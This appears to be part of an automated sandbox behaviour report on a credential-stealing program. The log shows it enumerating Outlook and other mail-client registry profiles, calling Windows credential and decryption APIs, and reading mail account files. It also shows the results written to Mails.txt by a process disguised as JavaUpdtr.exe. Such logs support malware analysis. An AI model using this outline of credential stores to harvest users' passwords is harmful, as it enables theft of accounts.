Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3517490d76624c419a828607e2a54604 True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3517490d76624c419a828607e2a54604 False 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\4b62e5f8c092a64ea9b79fd559a5a15e True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\4b62e5f8c092a64ea9b79fd559a5a15e False 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\609a848a708f544697003a34105400ef True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\609a848a708f544697003a34105400ef False 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\63cba20b08018a458b6edb5d87fb54da True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\63cba20b08018a458b6edb5d87fb54da False 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\828cd3a417cead4ab3a214070dce1c3d True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\828cd3a417cead4ab3a214070dce1c3d False 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046 True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046 False 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\88d17fec23cbdd4fb54ad1d34c0dce09 True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\88d17fec23cbdd4fb54ad1d34c0dce09 False 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2 True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2 False 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001, value_name = POP3 User, data = 0, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001, value_name = IMAP User, data = 0, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001, value_name = HTTP User, data = 0, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001, value_name = SMTP User, data = 0, type = REG_NONE False 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002, value_name = POP3 User, data = 0, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002, value_name = IMAP User, data = 0, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002, value_name = HTTP User, data = 0, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002, value_name = SMTP User, data = 0, type = REG_NONE False 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003, value_name = POP3 User, type = REG_BINARY True 1
Fn
Data
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003, value_name = POP3 Server, type = REG_BINARY True 1
Fn
Data
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003, value_name = Display Name, type = REG_BINARY True 1
Fn
Data
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003, value_name = Email, type = REG_BINARY True 1
Fn
Data
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003, value_name = SMTP Server, type = REG_BINARY True 1
Fn
Data
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003, value_name = SMTP Port, data = 0, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003, value_name = POP3 Port, data = 0, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003, value_name = POP3 Use SPA, data = 0, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003, value_name = POP3 Password, data = 0, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003, value_name = IMAP User, data = 103, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003, value_name = HTTP User, data = 103, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003, value_name = SMTP User, data = 103, type = REG_NONE False 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004, value_name = POP3 User, data = 103, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004, value_name = IMAP User, data = 103, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004, value_name = HTTP User, data = 103, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004, value_name = SMTP User, data = 103, type = REG_NONE False 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 False 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\a533ec91a4f74549ac2130b6908c8aac True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\a533ec91a4f74549ac2130b6908c8aac False 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\b70c659765f94740b657fee657d05ab4 True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\b70c659765f94740b657fee657d05ab4 False 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\cce6b8ce16bac4458e5e40e3530d6f1d True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\cce6b8ce16bac4458e5e40e3530d6f1d False 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\dd7f40a823cda64b92e9a96e9e46e406 True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\dd7f40a823cda64b92e9a96e9e46e406 False 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761 True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761 False 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001 True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001 False 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E} True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E} True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary, value_name = POP3 User, data = 103, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary, value_name = IMAP User, data = 103, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary, value_name = HTTP User, data = 103, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary, value_name = SMTP User, data = 103, type = REG_NONE False 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E} False 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook False 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\IncrediMail\Identities False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\IncrediMail\Identities False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Group Mail False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\MSNMessenger False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\MessengerService False 1
Fn
Module Load module_name = advapi32.dll, base_address = 0x74d40000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CredReadA, address_out = 0x74d871c1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CredFree, address_out = 0x74d4b2ec True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CredDeleteA, address_out = 0x74d87941 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CredEnumerateA, address_out = 0x74d87381 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CredEnumerateW, address_out = 0x74d87481 True 1
Fn
Module Load module_name = crypt32.dll, base_address = 0x759b0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\crypt32.dll, function = CryptUnprotectData, address_out = 0x759e5a7f True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Yahoo\Pager False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL False 1
Fn
Module Load module_name = advapi32.dll, base_address = 0x74d40000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CredReadA, address_out = 0x74d871c1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CredFree, address_out = 0x74d4b2ec True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CredDeleteA, address_out = 0x74d87941 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CredEnumerateA, address_out = 0x74d87381 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CredEnumerateW, address_out = 0x74d87481 True 1
Fn
File Create filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Microsoft\Windows Mail\account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ True 1
Fn
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Microsoft\Windows Mail\account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount, type = size True 1
Fn
File Read filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Microsoft\Windows Mail\account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount, size = 1506, size_out = 1506 True 1
Fn
Data
File Create filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Microsoft\Windows Mail\account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ True 1
Fn
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Microsoft\Windows Mail\account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount, type = size True 1
Fn
File Read filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Microsoft\Windows Mail\account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount, size = 670, size_out = 670 True 1
Fn
Data
File Create filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Microsoft\Windows Mail\account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ True 1
Fn
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Microsoft\Windows Mail\account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount, type = size True 1
Fn
File Read filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Microsoft\Windows Mail\account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount, size = 1734, size_out = 1734 True 1
Fn
Data
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail False 1
Fn
File Create filename = C:\Users\5P5NRG~1\AppData\Local\Temp\Mails.txt, desired_access = GENERIC_WRITE, share_mode = FILE_SHARE_READ True 1
Fn
File Write filename = C:\Users\5P5NRG~1\AppData\Local\Temp\Mails.txt, size = 50 True 1
Fn
Data
File Write filename = C:\Users\5P5NRG~1\AppData\Local\Temp\Mails.txt, size = 2 True 1
Fn
Data
File Write filename = C:\Users\5P5NRG~1\AppData\Local\Temp\Mails.txt, size = 29 True 1
File Write filename = C:\Users\5P5NRG~1\AppData\Local\Temp\Mails.txt, size = 52 True 1
File Write filename = C:\Users\5P5NRG~1\AppData\Local\Temp\Mails.txt, size = 40 True 1
File Write filename = C:\Users\5P5NRG~1\AppData\Local\Temp\Mails.txt, size = 26 True 1
File Write filename = C:\Users\5P5NRG~1\AppData\Local\Temp\Mails.txt, size = 22 True 1
File Write filename = C:\Users\5P5NRG~1\AppData\Local\Temp\Mails.txt, size = 24 True 1
File Write filename = C:\Users\5P5NRG~1\AppData\Local\Temp\Mails.txt, size = 26 True 1
File Write filename = C:\Users\5P5NRG~1\AppData\Local\Temp\Mails.txt, size = 28 True 1
File Write filename = C:\Users\5P5NRG~1\AppData\Local\Temp\Mails.txt, size = 22 True 1
File Write filename = C:\Users\5P5NRG~1\AppData\Local\Temp\Mails.txt, size = 29 True 1
File Write filename = C:\Users\5P5NRG~1\AppData\Local\Temp\Mails.txt, size = 22 True 1
File Write filename = C:\Users\5P5NRG~1\AppData\Local\Temp\Mails.txt, size = 27 True 1
File Write filename = C:\Users\5P5NRG~1\AppData\Local\Temp\Mails.txt, size = 22 True 1
File Write filename = C:\Users\5P5NRG~1\AppData\Local\Temp\Mails.txt, size = 50 True 1
File Write filename = C:\Users\5P5NRG~1\AppData\Local\Temp\Mails.txt, size = 2 True 2
Process #7: javaupdtr.exe
616 0
Information Value
ID #7
File Name c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe
Command Line "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Java\JavaUpdtr.exe"
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:01:40, Reason: Autostart
Unmonitor End Time: 00:01:58, Reason: Self Terminated
Monitor Duration 00:00:18
OS Process Information
Information Value
PID 0x4e8
Parent PID 0x3a4 (c:\windows\explorer.exe)
Bitness 32-bit
Is Created or Modified Executable True
Integrity Level Medium
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x4EC
0x6DC
0x6E4
0x6F8
0x6FC
0x720
0x724
0x730
0x734
Threads
Thread 0x4ec
615 0
Category Operation Information Success Count Logfile
System Get Info type = Operating System True 2
Environment Get Environment String name = temp, result_out = C:\Users\5P5NRG~1\AppData\Local\Temp True 1
File Create filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Temp\strpath.tmp, desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Temp\strpath.tmp, type = file_type True 2
File Write filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Temp\strpath.tmp, size = 64 True 1
User Lookup Privilege privilege = SeDebugPrivilege, luid = 20 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Java\JavaUpdtr.exe, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\SysWOW64\ntdll.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\SYSTEM32\MSCOREE.DLL, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\KERNEL32.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\KERNELBASE.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\ADVAPI32.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\msvcrt.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\SysWOW64\sechost.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\RPCRT4.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\SspiCli.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\CRYPTBASE.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\SHLWAPI.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\GDI32.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\USER32.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\LPK.dll, size = 2048 True 1
